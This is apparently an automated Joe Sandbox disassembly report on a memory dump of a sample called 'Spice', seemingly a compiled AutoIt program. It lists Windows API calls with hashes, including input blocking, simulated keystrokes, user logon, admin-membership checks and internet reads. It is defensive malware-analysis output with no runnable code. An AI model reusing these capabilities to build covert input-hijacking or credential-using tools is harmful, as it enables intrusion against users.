                                                                                                                                                                                                                                      • API String ID: 2574300362-1816364905
                                                                                                                                                                                                                                      • Opcode ID: 490bd33e2c5c755416d1164f282d22b2fa04e84e67ebb64fc6d9beaff87094d6
                                                                                                                                                                                                                                      • Instruction ID: b11045f215cfccf0a528e7aa1ede340646113af5ede38b547f1cb0a31f166aad
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 490bd33e2c5c755416d1164f282d22b2fa04e84e67ebb64fc6d9beaff87094d6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CAE0C2381107568FD7204B3ACC4AB4277D4FF08308F60942BEC85E2250DB70D840DF10
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: LocalTime__swprintf
                                                                                                                                                                                                                                      • String ID: %.3d$WIN_XPe
                                                                                                                                                                                                                                      • API String ID: 2070861257-2409531811
                                                                                                                                                                                                                                      • Opcode ID: 175bc587691c367ee48ad7acb014f4e09552d12b848f2e84983efed636834960
                                                                                                                                                                                                                                      • Instruction ID: 4833ca145feb53b284ddba6158253c56d9d8df1e5117a12e99ccdce2fa34b7e2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 175bc587691c367ee48ad7acb014f4e09552d12b848f2e84983efed636834960
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 89D01271808118EACB18AA90C844EFB737CFB04300F546852F946B2080D635A788AB22
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 00EE2AAD
                                                                                                                                                                                                                                      • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00EE2AE4
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Internet$AvailableDataFileQueryRead
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 599397726-0
                                                                                                                                                                                                                                      • Opcode ID: 8b51e7c71bf8653a016d8dd5dd5ba50b76a8c99ecb5c2ce7cb1f4f9c8be2f446
                                                                                                                                                                                                                                      • Instruction ID: ea3d087e0f00e66dc24f18cef78c383f03e86e74b103d3479d1f771f6c89bad7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8b51e7c71bf8653a016d8dd5dd5ba50b76a8c99ecb5c2ce7cb1f4f9c8be2f446
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0F41D271A0024DBFEB20DE96DC81EBBB7ECEB40718F10506EF709B6141EA719E419A60
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00ED42FF
                                                                                                                                                                                                                                      • DeviceIoControl.KERNEL32(00000000,002D1400,00000007,0000000C,?,0000000C,?,00000000), ref: 00ED433C
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00ED4345
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 33631002-0
                                                                                                                                                                                                                                      • Opcode ID: e8e529527a3df20e6df1a4aa6271e93b909713ef0674ab0b1fbc36b7d86650c4
                                                                                                                                                                                                                                      • Instruction ID: 2b5d1c9f9450ca640d488efbb1d2e08372be919d1f3905f3cb69af2c6378f5a9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e8e529527a3df20e6df1a4aa6271e93b909713ef0674ab0b1fbc36b7d86650c4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 141182B1900229BFEB109BECDC44FAFB7BCEB08710F100156B914F7290C6745D0187A1
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00ED4F45
                                                                                                                                                                                                                                      • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00ED4F5C
                                                                                                                                                                                                                                      • FreeSid.ADVAPI32(?), ref: 00ED4F6C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3429775523-0
                                                                                                                                                                                                                                      • Opcode ID: e54856831241b7c40b81b8ab2dcce4ac6932dcd9e4930ad1fb986bb40b016e0a
                                                                                                                                                                                                                                      • Instruction ID: 2cc4717426c2f8db4f761c0904190c0f708d79f74bb5789d2a9bf8f6b9d7bdd9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e54856831241b7c40b81b8ab2dcce4ac6932dcd9e4930ad1fb986bb40b016e0a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D9F04F75A1130CBFDF00DFE0DC89AAEB7BCFF08201F004469A501E2180D7345A049B50
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00ED1B01
                                                                                                                                                                                                                                      • keybd_event.USER32(?,76C1C0D0,?,00000000), ref: 00ED1B14
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InputSendkeybd_event
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3536248340-0
                                                                                                                                                                                                                                      • Opcode ID: 8a9233860eb9be686cb3cb20126ccbcf23cda5c90c3f1b61135b9645f9345687
                                                                                                                                                                                                                                      • Instruction ID: 2d3ddb9dbcc33d20d7ba1c6b1ab065fabad3f92fc5e89c57639839b3cc8f30ef
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8a9233860eb9be686cb3cb20126ccbcf23cda5c90c3f1b61135b9645f9345687
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7CF0497190024DEBDB04CF94C805BFE7BB4FF04315F00804AF955A6292D7799615DF94
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,00EE9B52,?,00F0098C,?), ref: 00EDA6DA
                                                                                                                                                                                                                                      • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,00EE9B52,?,00F0098C,?), ref: 00EDA6EC
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorFormatLastMessage
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3479602957-0
                                                                                                                                                                                                                                      • Opcode ID: 248d611f3dc8df6cf99de96dfb920610b8ef3de9d693f902f7eaab75f6169830
                                                                                                                                                                                                                                      • Instruction ID: f193a2d0aed7bae0364ad52b42f481b9336477d40a386baa268416bfeb12adbf
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 248d611f3dc8df6cf99de96dfb920610b8ef3de9d693f902f7eaab75f6169830
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B7F0AE3550521DFBDB21AFA4CC48FDA77ACFF09751F008156B51CE6151DA309641CBE1
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00E98F87,?,?,?,00000001), ref: 00E9A38A
                                                                                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00E9A393
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3192549508-0
                                                                                                                                                                                                                                      • Opcode ID: 295f5e4ff7cafaa3d538dea3ec5ecf60453e5a8b68cf6ce131804185372762b9
                                                                                                                                                                                                                                      • Instruction ID: 6d8ef03834fada7f6a307499ebb5face33e3c6efd5aabeddb01d7453737e56f0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 295f5e4ff7cafaa3d538dea3ec5ecf60453e5a8b68cf6ce131804185372762b9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 17B0923106420CABCB422B91EC09B883F68FB45A62F004010FA0D44060CF625450AA91
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • BlockInput.USER32(00000001), ref: 00EE45F0
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: BlockInput
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3456056419-0
                                                                                                                                                                                                                                      • Opcode ID: 7ad340be6953b9fa0dd67313cba65085b3ddb66fe4ae6b60e93331a3d0265244
                                                                                                                                                                                                                                      • Instruction ID: 4357b852c3eb641037dc18eea451e894eb8e260d6574ed44a2b9467445e7d9e1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7ad340be6953b9fa0dd67313cba65085b3ddb66fe4ae6b60e93331a3d0265244
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D6E0D8722002099FC310AF5AD400E86F7D8AF54760F00C416FC49E7350DF70EC008B90
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00ED5205
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: mouse_event
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2434400541-0
                                                                                                                                                                                                                                      • Opcode ID: ed8521726e503da4aa75bbe2bc50e3a755075197f806ebdb62cc11fca125cdfa
                                                                                                                                                                                                                                      • Instruction ID: 20eb76c0850c4ca369b9260c7759333a150bbc6a2658d41c3b87396776212306
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ed8521726e503da4aa75bbe2bc50e3a755075197f806ebdb62cc11fca125cdfa
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 42D092A7162E0A79ED5807249E1FFB61648F3017C5F98668B7142A92C2EDD4A887A431
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00EC8FA7), ref: 00EC9389
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: LogonUser
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1244722697-0
                                                                                                                                                                                                                                      • Opcode ID: 2914fc1d2ede1f7e272b741da865c73f7e9e5992117d39ab73ef2a77d8e002c0
                                                                                                                                                                                                                                      • Instruction ID: 3a968c664407d54adbba36a9d7b3f752880d7ec216113c5b3f0c3e41737f9770
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2914fc1d2ede1f7e272b741da865c73f7e9e5992117d39ab73ef2a77d8e002c0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 82D09E3226450EABEF019EA4DD05EAF3B69EB04B01F408511FE15D51A1C775D935AB60
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetUserNameW.ADVAPI32(?,?), ref: 00EB0734
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: NameUser
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2645101109-0
                                                                                                                                                                                                                                      • Opcode ID: d7770c02ba09daea4a1e945ff0d3084ba38c1f7bd6e07a62b2fac48537a110a3
                                                                                                                                                                                                                                      • Instruction ID: bc540aa20f01c6cfb594479100bda6acd33c4bb3c4d6efe563f6a9be97ec4d1a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d7770c02ba09daea4a1e945ff0d3084ba38c1f7bd6e07a62b2fac48537a110a3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D6C04CF180010DDBDB15DBA0D988EEF77BCBB04304F104455A105B2100D7749B449A71
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00E9A35A
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3192549508-0
                                                                                                                                                                                                                                      • Opcode ID: 0c34419d9febf82cccda4cec359e6b4a1d84c1bcb7e23b38be56c5643a4a6dc3
                                                                                                                                                                                                                                      • Instruction ID: c002dcee983b596693e1d43f4e7bf216d7653966eacbbd632dc3f4c17e2201d7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0c34419d9febf82cccda4cec359e6b4a1d84c1bcb7e23b38be56c5643a4a6dc3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6BA0113002020CABCB022B82EC08888BFACEA002A0B008020F80C000228B32A820AA80
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00EE7F45
                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00EE7F57
                                                                                                                                                                                                                                      • DestroyWindow.USER32 ref: 00EE7F65
                                                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 00EE7F7F
                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000), ref: 00EE7F86
                                                                                                                                                                                                                                      • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00EE80C7
                                                                                                                                                                                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00EE80D7
                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EE811F
                                                                                                                                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 00EE812B
                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00EE8165
                                                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EE8187
                                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EE819A
                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EE81A5
                                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EE81AE
                                                                                                                                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EE81BD
                                                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EE81C6
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EE81CD
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00EE81D8
                                                                                                                                                                                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EE81EA
                                                                                                                                                                                                                                      • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00F03C7C,00000000), ref: 00EE8200
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00EE8210
                                                                                                                                                                                                                                      • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00EE8236
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00EE8255
                                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EE8277
